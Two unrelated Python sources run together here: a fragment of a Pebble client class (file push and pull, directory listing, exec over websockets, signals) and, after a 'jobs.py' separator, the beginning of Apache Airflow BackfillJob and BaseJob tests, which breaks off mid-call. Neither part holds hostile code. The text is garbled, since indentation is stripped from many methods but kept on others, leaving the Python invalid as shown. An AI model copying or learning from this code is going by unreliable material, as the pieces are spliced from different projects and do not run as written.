def _wait_change(self, change_id: ChangeID, timeout: float = None) -> Change:
"""Call the wait-change API endpoint directly."""
query = {}
if timeout is not None:
query['timeout'] = _format_timeout(timeout)
try:
resp = self._request('GET', '/v1/changes/{}/wait'.format(change_id), query)
except APIError as e:
if e.code == 404:
raise NotImplementedError('server does not implement wait-change endpoint')
if e.code == 504:
raise TimeoutError('timed out waiting for change {} ({} seconds)'.format(
change_id, timeout))
raise
return Change.from_dict(resp['result'])
def _wait_change_using_polling(self, change_id, timeout, delay):
"""Wait for a change to be ready by polling the get-change API."""
deadline = time.time() + timeout if timeout is not None else None
while timeout is None or time.time() < deadline:
change = self.get_change(change_id)
if change.ready:
return change
time.sleep(delay)
raise TimeoutError('timed out waiting for change {} ({} seconds)'.format(
change_id, timeout))
def add_layer(
self, label: str, layer: typing.Union[str, dict, Layer], *, combine: bool = False):
"""Dynamically add a new layer onto the Pebble configuration layers.
If combine is False (the default), append the new layer as the top
layer with the given label. If combine is True and the label already
exists, the two layers are combined into a single one considering the
layer override rules; if the layer doesn't exist, it is added as usual.
"""
if not isinstance(label, str):
raise TypeError('label must be a str, not {}'.format(type(label).__name__))
if isinstance(layer, str):
layer_yaml = layer
elif isinstance(layer, dict):
layer_yaml = Layer(layer).to_yaml()
elif isinstance(layer, Layer):
layer_yaml = layer.to_yaml()
else:
raise TypeError('layer must be str, dict, or pebble.Layer, not {}'.format(
type(layer).__name__))
body = {
'action': 'add',
'combine': combine,
'label': label,
'format': 'yaml',
'layer': layer_yaml,
}
self._request('POST', '/v1/layers', body=body)
def get_plan(self) -> Plan:
"""Get the Pebble plan (currently contains only combined services)."""
resp = self._request('GET', '/v1/plan', {'format': 'yaml'})
return Plan(resp['result'])
def get_services(self, names: typing.List[str] = None) -> typing.List[ServiceInfo]:
"""Get the service status for the configured services.
If names is specified, only fetch the service status for the services
named.
"""
query = None
if names is not None:
query = {'names': ','.join(names)}
resp = self._request('GET', '/v1/services', query)
return [ServiceInfo.from_dict(info) for info in resp['result']]
    def pull(self, path: str, *, encoding: str = 'utf-8') -> typing.Union[typing.BinaryIO,
                                                                          typing.TextIO]:
        """Read a file's content from the remote system.

        Args:
            path: Path of the file to read from the remote system.
            encoding: Encoding to use for decoding the file's bytes to str,
                or None to specify no decoding.

        Returns:
            A readable file-like object, whose read() method will return str
            objects decoded according to the specified encoding, or bytes if
            encoding is None.

        Raises:
            ProtocolError: if the server response is not well-formed
                multipart form-data or is missing the expected parts.
            PathError: if the server reports an error for *path* (via
                _raise_on_path_error).
        """
        query = {
            'action': 'read',
            'path': path,
        }
        headers = {'Accept': 'multipart/form-data'}
        response = self._request_raw('GET', '/v1/files', query, headers)
        # The body is multipart: a JSON "response" part plus a "files" part
        # carrying the raw file bytes; the boundary comes from the header.
        options = self._ensure_content_type(response.headers, 'multipart/form-data')
        boundary = options.get('boundary', '')
        if not boundary:
            raise ProtocolError('invalid boundary {!r}'.format(boundary))
        # We have to manually write the Content-Type with boundary, because
        # email.parser expects the entire multipart message with headers.
        parser = email.parser.BytesFeedParser()
        parser.feed(b'Content-Type: multipart/form-data; boundary='
                    + boundary.encode('utf-8') + b'\r\n\r\n')
        # Then read the rest of the response and feed it to the parser.
        while True:
            chunk = response.read(self._chunk_size)
            if not chunk:
                break
            parser.feed(chunk)
        message = parser.close()
        # Walk over the multipart parts and read content and metadata.
        resp = None
        content = None
        for part in message.walk():
            name = part.get_param('name', header='Content-Disposition')
            if name == 'response':
                resp = _json_loads(part.get_payload())
            elif name == 'files':
                filename = part.get_filename()
                if filename != path:
                    raise ProtocolError('path not expected: {}'.format(filename))
                # decode=True, ironically, avoids decoding bytes to str
                content = part.get_payload(decode=True)
        if resp is None:
            raise ProtocolError('no "response" field in multipart body')
        self._raise_on_path_error(resp, path)
        if content is None:
            raise ProtocolError('no file content in multipart response')
        # Wrap the raw bytes in a text or binary reader per the caller's request.
        if encoding is not None:
            reader = io.StringIO(content.decode(encoding))
        else:
            reader = io.BytesIO(content)
        return reader
@staticmethod
def _raise_on_path_error(resp, path):
result = resp['result'] or [] # in case it's null instead of []
paths = {item['path']: item for item in result}
if path not in paths:
raise ProtocolError('path not found in response metadata: {}'.format(resp))
error = paths[path].get('error')
if error:
raise PathError(error['kind'], error['message'])
def push(
self, path: str, source: typing.Union[bytes, str, typing.BinaryIO, typing.TextIO], *,
encoding: str = 'utf-8', make_dirs: bool = False, permissions: int = None,
user_id: int = None, user: str = None, group_id: int = None, group: str = None):
"""Write content to a given file path on the remote system.
Args:
path: Path of the file to write to on the remote system.
source: Source of data to write. This is either a concrete str or
bytes instance, or a readable file-like object.
encoding: Encoding to use for encoding source str to bytes, or
strings read from source if it is a TextIO type. Ignored if
source is bytes or BinaryIO.
make_dirs: If True, create parent directories if they don't exist.
permissions: Permissions (mode) to create file with (Pebble default
is 0o644).
user_id: User ID (UID) for file.
user: Username for file. User's UID must match user_id if both are
specified.
group_id: Group ID (GID) for file.
group: Group name for file. Group's GID must match group_id if
both are specified.
"""
info = self._make_auth_dict(permissions, user_id, user, group_id, group)
info['path'] = path
if make_dirs:
info['make-dirs'] = True
metadata = {
'action': 'write',
'files': [info],
}
data, content_type = self._encode_multipart(metadata, path, source, encoding)
headers = {
'Accept': 'application/json',
'Content-Type': content_type,
}
response = self._request_raw('POST', '/v1/files', None, headers, data)
self._ensure_content_type(response.headers, 'application/json')
resp = _json_loads(response.read())
self._raise_on_path_error(resp, path)
@staticmethod
def _make_auth_dict(permissions, user_id, user, group_id, group) -> typing.Dict:
d = {}
if permissions is not None:
d['permissions'] = format(permissions, '03o')
if user_id is not None:
d['user-id'] = user_id
if user is not None:
d['user'] = user
if group_id is not None:
d['group-id'] = group_id
if group is not None:
d['group'] = group
return d
def _encode_multipart(self, metadata, path, source, encoding):
# Python's stdlib mime/multipart handling is screwy and doesn't handle
# binary properly, so roll our own.
if isinstance(source, str):
source = io.StringIO(source)
elif isinstance(source, bytes):
source = io.BytesIO(source)
boundary = binascii.hexlify(os.urandom(16))
path_escaped = path.replace('"', '\\"').encode('utf-8') # NOQA: test_quote_backslashes
content_type = 'multipart/form-data; boundary="' + boundary.decode('utf-8') + '"'
def generator():
yield b''.join([
b'--', boundary, b'\r\n',
b'Content-Type: application/json\r\n',
b'Content-Disposition: form-data; name="request"\r\n',
b'\r\n',
json.dumps(metadata).encode('utf-8'), b'\r\n',
b'--', boundary, b'\r\n',
b'Content-Type: application/octet-stream\r\n',
b'Content-Disposition: form-data; name="files"; filename="',
path_escaped, b'"\r\n',
b'\r\n',
])
content = source.read(self._chunk_size)
while content:
if isinstance(content, str):
content = content.encode(encoding)
yield content
content = source.read(self._chunk_size)
yield b''.join([
b'\r\n',
b'--', boundary, b'--\r\n',
])
return generator(), content_type
def list_files(self, path: str, *, pattern: str = None,
itself: bool = False) -> typing.List[FileInfo]:
"""Return list of directory entries from given path on remote system.
Despite the name, this method returns a list of files *and*
directories, similar to :func:`os.listdir` or :func:`os.scandir`.
Args:
path: Path of the directory to list, or path of the file to return
information about.
pattern: If specified, filter the list to just the files that match,
for example ``*.txt``.
itself: If path refers to a directory, return information about the
directory itself, rather than its contents.
"""
query = {
'action': 'list',
'path': path,
}
if pattern:
query['pattern'] = pattern
if itself:
query['itself'] = 'true'
resp = self._request('GET', '/v1/files', query)
result = resp['result'] or [] # in case it's null instead of []
return [FileInfo.from_dict(d) for d in result]
def make_dir(
self, path: str, *, make_parents: bool = False, permissions: int = None,
user_id: int = None, user: str = None, group_id: int = None, group: str = None):
"""Create a directory on the remote system with the given attributes.
Args:
path: Path of the directory to create on the remote system.
make_parents: If True, create parent directories if they don't exist.
permissions: Permissions (mode) to create directory with (Pebble
default is 0o755).
user_id: User ID (UID) for directory.
user: Username for directory. User's UID must match user_id if
both are specified.
group_id: Group ID (GID) for directory.
group: Group name for directory. Group's GID must match group_id
if both are specified.
"""
info = self._make_auth_dict(permissions, user_id, user, group_id, group)
info['path'] = path
if make_parents:
info['make-parents'] = True
body = {
'action': 'make-dirs',
'dirs': [info],
}
resp = self._request('POST', '/v1/files', None, body)
self._raise_on_path_error(resp, path)
def remove_path(self, path: str, *, recursive: bool = False):
"""Remove a file or directory on the remote system.
Args:
path: Path of the file or directory to delete from the remote system.
recursive: If True, recursively delete path and everything under it.
"""
info = {'path': path}
if recursive:
info['recursive'] = True
body = {
'action': 'remove',
'paths': [info],
}
resp = self._request('POST', '/v1/files', None, body)
self._raise_on_path_error(resp, path)
    def exec(
        self,
        command: typing.List[str],
        *,
        environment: typing.Dict[str, str] = None,
        working_dir: str = None,
        timeout: float = None,
        user_id: int = None,
        user: str = None,
        group_id: int = None,
        group: str = None,
        stdin: typing.Union[str, bytes, typing.TextIO, typing.BinaryIO] = None,
        stdout: typing.Union[typing.TextIO, typing.BinaryIO] = None,
        stderr: typing.Union[typing.TextIO, typing.BinaryIO] = None,
        encoding: str = 'utf-8',
        combine_stderr: bool = False
    ) -> ExecProcess:
        r"""Execute the given command on the remote system.

        Most of the parameters are explained in the "Parameters" section
        below, however, input/output handling is a bit more complex. Some
        examples are shown below::

            # Simple command with no output; just check exit code
            >>> process = client.exec(['send-emails'])
            >>> process.wait()

            # Fetch output as string
            >>> process = client.exec(['python3', '--version'])
            >>> version, _ = process.wait_output()
            >>> print(version)
            Python 3.8.10

            # Fetch both stdout and stderr as strings
            >>> process = client.exec(['pg_dump', '-s', ...])
            >>> schema, logs = process.wait_output()

            # Stream input from a string and write output to files
            >>> stdin = 'foo\nbar\n'
            >>> with open('out.txt', 'w') as out, open('err.txt', 'w') as err:
            ...     process = client.exec(['awk', '{ print toupper($0) }'],
            ...                           stdin=stdin, stdout=out, stderr=err)
            ...     process.wait()
            >>> open('out.txt').read()
            'FOO\nBAR\n'
            >>> open('err.txt').read()
            ''

            # Real-time streaming using ExecProcess.stdin and ExecProcess.stdout
            >>> process = client.exec(['cat'])
            >>> def stdin_thread():
            ...     for line in ['one\n', '2\n', 'THREE\n']:
            ...         process.stdin.write(line)
            ...         process.stdin.flush()
            ...         time.sleep(1)
            ...     process.stdin.close()
            ...
            >>> threading.Thread(target=stdin_thread).start()
            >>> for line in process.stdout:
            ...     print(datetime.datetime.now().strftime('%H:%M:%S'), repr(line))
            ...
            16:20:26 'one\n'
            16:20:27 '2\n'
            16:20:28 'THREE\n'
            >>> process.wait()  # will return immediately as stdin was closed

            # Show exception raised for non-zero return code
            >>> process = client.exec(['ls', 'notexist'])
            >>> out, err = process.wait_output()
            Traceback (most recent call last):
              ...
            ExecError: "ls" returned exit code 2
            >>> exc = sys.last_value
            >>> exc.exit_code
            2
            >>> exc.stdout
            ''
            >>> exc.stderr
            "ls: cannot access 'notfound': No such file or directory\n"

        Args:
            command: Command to execute: the first item is the name (or path)
                of the executable, the rest of the items are the arguments.
            environment: Environment variables to pass to the process.
            working_dir: Working directory to run the command in. If not set,
                Pebble uses the target user's $HOME directory (and if the user
                argument is not set, $HOME of the user Pebble is running as).
            timeout: Timeout in seconds for the command execution, after which
                the process will be terminated. If not specified, the
                execution never times out.
            user_id: User ID (UID) to run the process as.
            user: Username to run the process as. User's UID must match
                user_id if both are specified.
            group_id: Group ID (GID) to run the process as.
            group: Group name to run the process as. Group's GID must match
                group_id if both are specified.
            stdin: A string or readable file-like object that is sent to the
                process's standard input. If not set, the caller can write
                input to :attr:`ExecProcess.stdin` to stream input to the
                process.
            stdout: A writable file-like object that the process's standard
                output is written to. If not set, the caller can use
                :meth:`ExecProcess.wait_output` to capture output as a string,
                or read from :meth:`ExecProcess.stdout` to stream output from
                the process.
            stderr: A writable file-like object that the process's standard
                error is written to. If not set, the caller can use
                :meth:`ExecProcess.wait_output` to capture error output as a
                string, or read from :meth:`ExecProcess.stderr` to stream
                error output from the process. Must be None if combine_stderr
                is True.
            encoding: If encoding is set (the default is UTF-8), the types
                read or written to stdin/stdout/stderr are str, and encoding
                is used to encode them to bytes. If encoding is None, the
                types read or written are raw bytes.
            combine_stderr: If True, process's stderr output is combined into
                its stdout (the stderr argument must be None). If False,
                separate streams are used for stdout and stderr.

        Returns:
            A Process object representing the state of the running process.
            To wait for the command to finish, the caller will typically call
            :meth:`ExecProcess.wait` if stdout/stderr were provided as
            arguments to :meth:`exec`, or :meth:`ExecProcess.wait_output` if
            not.
        """
        # Validate command and stdin/stderr combinations up front so we fail
        # before submitting anything to the server.
        if not isinstance(command, list) or not all(isinstance(s, str) for s in command):
            raise TypeError('command must be a list of str, not {}'.format(
                type(command).__name__))
        if len(command) < 1:
            raise ValueError('command must contain at least one item')
        if stdin is not None:
            # Normalize str/bytes stdin into an in-memory binary reader;
            # anything else must already be a readable file-like object.
            if isinstance(stdin, str):
                if encoding is None:
                    raise ValueError('encoding must be set if stdin is str')
                stdin = io.BytesIO(stdin.encode(encoding))
            elif isinstance(stdin, bytes):
                if encoding is not None:
                    raise ValueError('encoding must be None if stdin is bytes')
                stdin = io.BytesIO(stdin)
            elif not hasattr(stdin, 'read'):
                raise TypeError('stdin must be str, bytes, or a readable file-like object')
        if combine_stderr and stderr is not None:
            raise ValueError('stderr must be None if combine_stderr is True')
        # Submit the exec request; the returned task-id identifies the
        # websockets used for this execution's I/O.
        body = {
            'command': command,
            'environment': environment or {},
            'working-dir': working_dir,
            'timeout': _format_timeout(timeout) if timeout is not None else None,
            'user-id': user_id,
            'user': user,
            'group-id': group_id,
            'group': group,
            'split-stderr': not combine_stderr,
        }
        resp = self._request('POST', '/v1/exec', body=body)
        change_id = resp['change']
        task_id = resp['result']['task-id']
        stderr_ws = None
        try:
            control_ws = self._connect_websocket(task_id, 'control')
            stdio_ws = self._connect_websocket(task_id, 'stdio')
            if not combine_stderr:
                stderr_ws = self._connect_websocket(task_id, 'stderr')
        except websocket.WebSocketException as e:
            # Error connecting to websockets, probably due to the exec/change
            # finishing early with an error. Call wait_change to pick that up.
            change = self.wait_change(ChangeID(change_id))
            if change.err:
                raise ChangeError(change.err, change)
            raise ConnectionError('unexpected error connecting to websockets: {}'.format(e))
        cancel_stdin = None
        cancel_reader = None
        threads = []
        if stdin is not None:
            if _has_fileno(stdin):
                if sys.platform == 'win32':
                    raise NotImplementedError('file-based stdin not supported on Windows')
                # Create a pipe so _reader_to_websocket can select() on the
                # reader as well as this cancel_reader; when we write anything
                # to cancel_writer it'll trigger the select and end the thread.
                cancel_reader, cancel_writer = os.pipe()

                def cancel_stdin():
                    os.write(cancel_writer, b'x')  # doesn't matter what we write
                    os.close(cancel_writer)

            # A background thread pumps the caller's stdin into the websocket.
            t = _start_thread(_reader_to_websocket, stdin, stdio_ws, encoding, cancel_reader)
            threads.append(t)
            process_stdin = None
        else:
            # No stdin given: expose a writer so the caller can stream input.
            process_stdin = _WebsocketWriter(stdio_ws)
            if encoding is not None:
                process_stdin = io.TextIOWrapper(process_stdin, encoding=encoding, newline='')
        if stdout is not None:
            # Pump websocket output into the caller-provided writer.
            t = _start_thread(_websocket_to_writer, stdio_ws, stdout, encoding)
            threads.append(t)
            process_stdout = None
        else:
            # Expose a reader so the caller can stream/capture output.
            process_stdout = _WebsocketReader(stdio_ws)
            if encoding is not None:
                process_stdout = io.TextIOWrapper(process_stdout, encoding=encoding, newline='')
        process_stderr = None
        if not combine_stderr:
            if stderr is not None:
                t = _start_thread(_websocket_to_writer, stderr_ws, stderr, encoding)
                threads.append(t)
            else:
                process_stderr = _WebsocketReader(stderr_ws)
                if encoding is not None:
                    process_stderr = io.TextIOWrapper(
                        process_stderr, encoding=encoding, newline='')
        process = ExecProcess(
            stdin=process_stdin,
            stdout=process_stdout,
            stderr=process_stderr,
            client=self,
            timeout=timeout,
            stdio_ws=stdio_ws,
            stderr_ws=stderr_ws,
            control_ws=control_ws,
            command=command,
            encoding=encoding,
            change_id=ChangeID(change_id),
            cancel_stdin=cancel_stdin,
            cancel_reader=cancel_reader,
            threads=threads,
        )
        return process
def _connect_websocket(self, task_id: str, websocket_id: str) -> websocket.WebSocket:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.socket_path)
url = self._websocket_url(task_id, websocket_id)
ws = websocket.WebSocket(skip_utf8_validation=True)
ws.connect(url, socket=sock)
return ws
def _websocket_url(self, task_id: str, websocket_id: str) -> str:
base_url = self.base_url.replace('http://', 'ws://')
url = '{}/v1/tasks/{}/websocket/{}'.format(base_url, task_id, websocket_id)
return url
def send_signal(self, sig: typing.Union[int, str], services: typing.List[str]):
"""Send the given signal to the list of services named.
Args:
sig: Name or number of signal to send, e.g., "SIGHUP", 1, or
signal.SIGHUP.
services: Non-empty list of service names to send the signal to.
Raises:
APIError: If any of the services are not in the plan or are not
currently running.
"""
if not isinstance(services, (list, tuple)):
raise TypeError('services must be a list of str, not {}'.format(
type(services).__name__))
for s in services:
if not isinstance(s, str):
raise TypeError('service names must be str, not {}'.format(type(s).__name__))
if isinstance(sig, int):
sig = signal.Signals(sig).name
body = {
'signal': sig,
'services': services,
}
self._request('POST', '/v1/signals', body=body)
|
jobs.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import six
import threading
import time
import unittest
from tempfile import mkdtemp
import sqlalchemy
from airflow import AirflowException, settings, models
from airflow.bin import cli
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.bash_operator import BashOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.net import get_hostname
from mock import Mock, patch, MagicMock, PropertyMock
from tests.executors.test_executor import TestExecutor
from tests.core import TEST_DAG_FOLDER
from airflow import configuration
configuration.load_test_config()
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
# Sink path for task output these tests don't care about.
DEV_NULL = '/dev/null'
# Canonical execution date used throughout these tests.
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
# Directory of test DAG files that live next to this test module.
TEST_DAGS_FOLDER = os.path.join(
    os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
    """Tests for BaseJob lifecycle bookkeeping (state and end_date)."""

    class TestJob(BaseJob):
        """Minimal BaseJob whose _execute simply runs a supplied callback."""
        __mapper_args__ = {
            'polymorphic_identity': 'TestJob'
        }

        def __init__(self, cb):
            self.cb = cb
            super(BaseJobTest.TestJob, self).__init__()

        def _execute(self):
            return self.cb()

    def test_state_success(self):
        # A callback that returns normally leaves the job in SUCCESS.
        job = self.TestJob(lambda: True)
        job.run()
        # assertEqual: assertEquals is a deprecated alias, removed in Py3.12.
        self.assertEqual(job.state, State.SUCCESS)
        self.assertIsNotNone(job.end_date)

    def test_state_sysexit(self):
        # sys.exit(0) counts as a clean exit, not a failure.
        import sys
        job = self.TestJob(lambda: sys.exit(0))
        job.run()
        self.assertEqual(job.state, State.SUCCESS)
        self.assertIsNotNone(job.end_date)

    def test_state_failed(self):
        # An exception from the callback propagates and marks the job FAILED.
        def abort():
            raise RuntimeError("fail")

        job = self.TestJob(abort)
        with self.assertRaises(RuntimeError):
            job.run()
        self.assertEqual(job.state, State.FAILED)
        self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
    def setUp(self):
        # Fresh CLI parser and a DagBag (including example DAGs) per test.
        self.parser = cli.CLIFactory.get_parser()
        self.dagbag = DagBag(include_examples=True)
    @unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
                     "concurrent access not supported in sqlite")
    def test_trigger_controller_dag(self):
        # Before the controller runs, the target DAG has no runs, so the
        # scheduler queues nothing for it.
        dag = self.dagbag.get_dag('example_trigger_controller_dag')
        target_dag = self.dagbag.get_dag('example_trigger_target_dag')
        dag.clear()
        target_dag.clear()
        scheduler = SchedulerJob()
        queue = Mock()
        scheduler._process_task_instances(target_dag, queue=queue)
        self.assertFalse(queue.append.called)
        # Backfilling the controller DAG triggers a run of the target DAG...
        job = BackfillJob(
            dag=dag,
            start_date=DEFAULT_DATE,
            end_date=DEFAULT_DATE,
            ignore_first_depends_on_past=True
        )
        job.run()
        # ...after which the scheduler does queue the target DAG's tasks.
        scheduler = SchedulerJob()
        queue = Mock()
        scheduler._process_task_instances(target_dag, queue=queue)
        self.assertTrue(queue.append.called)
        target_dag.clear()
        dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == 'example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
    @unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
                     "concurrent access not supported in sqlite")
    def test_backfill_examples(self):
        """
        Test backfilling example dags
        """
        # some DAGs really are just examples... but try to make them work!
        skip_dags = [
            'example_http_operator',
            'example_twitter_dag',
            'example_trigger_target_dag',
            'example_trigger_controller_dag', # tested above
            'test_utils', # sleeps forever
            'example_kubernetes_executor', # requires kubernetes cluster
            'example_kubernetes_operator' # requires kubernetes cluster
        ]
        logger = logging.getLogger('BackfillJobTest.test_backfill_examples')
        dags = [
            dag for dag in self.dagbag.dags.values()
            if 'example_dags' in dag.full_filepath and dag.dag_id not in skip_dags
        ]
        # Clear state first so every example starts from a clean slate.
        for dag in dags:
            dag.clear(
                start_date=DEFAULT_DATE,
                end_date=DEFAULT_DATE)
        # Sorted by dag_id for a deterministic run order across test runs.
        for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
            logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
            job = BackfillJob(
                dag=dag,
                start_date=DEFAULT_DATE,
                end_date=DEFAULT_DATE,
                ignore_first_depends_on_past=True)
            job.run()
    def test_backfill_conf(self):
        # A conf dict passed to BackfillJob must end up stored on the DagRun.
        dag = DAG(
            dag_id='test_backfill_conf',
            start_date=DEFAULT_DATE,
            schedule_interval='@daily')
        with dag:
            DummyOperator(
                task_id='op',
                dag=dag)
        dag.clear()
        executor = TestExecutor(do_update=True)
        conf = json.loads("""{"key": "value"}""")
        job = BackfillJob(dag=dag,
                          executor=executor,
                          start_date=DEFAULT_DATE,
                          end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                          conf=conf)
        job.run()
        dr = DagRun.find(dag_id='test_backfill_conf')
        self.assertEqual(conf, dr[0].conf)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
    def test_backfill_rerun_failed_tasks_without_flag(self):
        # Without rerun_failed_tasks, backfilling over an already-FAILED task
        # must raise instead of silently re-running it.
        dag = DAG(
            dag_id='test_backfill_rerun_failed',
            start_date=DEFAULT_DATE,
            schedule_interval='@daily')
        with dag:
            DummyOperator(
                task_id='test_backfill_rerun_failed_task-1',
                dag=dag)
        dag.clear()
        executor = TestExecutor(do_update=True)
        job = BackfillJob(dag=dag,
                          executor=executor,
                          start_date=DEFAULT_DATE,
                          end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                          )
        job.run()
        # Simulate a failed earlier run for the first execution date.
        ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
                execution_date=DEFAULT_DATE)
        ti.refresh_from_db()
        ti.set_state(State.FAILED)
        job = BackfillJob(dag=dag,
                          executor=executor,
                          start_date=DEFAULT_DATE,
                          end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                          rerun_failed_tasks=False
                          )
        with self.assertRaises(AirflowException):
            job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
    def test_backfill_pooled_tasks(self):
        """
        Test that queued tasks are executed by BackfillJob

        Test for https://github.com/airbnb/airflow/pull/1225
        """
        session = settings.Session()
        # A single-slot pool forces the task through the QUEUED state first.
        pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
        session.add(pool)
        session.commit()
        dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
        dag.clear()
        job = BackfillJob(
            dag=dag,
            start_date=DEFAULT_DATE,
            end_date=DEFAULT_DATE)
        # run with timeout because this creates an infinite loop if not
        # caught
        with timeout(seconds=30):
            job.run()
        ti = TI(
            task=dag.get_task('test_backfill_pooled_task'),
            execution_date=DEFAULT_DATE)
        ti.refresh_from_db()
        self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
    """
    Test that backfill respects ignore_first_depends_on_past.

    A single-date backfill on a depends_on_past DAG deadlocks when the
    previous schedule never ran, unless the first depends_on_past check
    is ignored.
    """
    dag = self.dagbag.get_dag('test_depends_on_past')
    dag.clear()
    run_date = DEFAULT_DATE + datetime.timedelta(days=5)

    # backfill should deadlock without the flag
    self.assertRaisesRegexp(
        AirflowException,
        'BackfillJob is deadlocked',
        BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)

    BackfillJob(
        dag=dag,
        start_date=run_date,
        end_date=run_date,
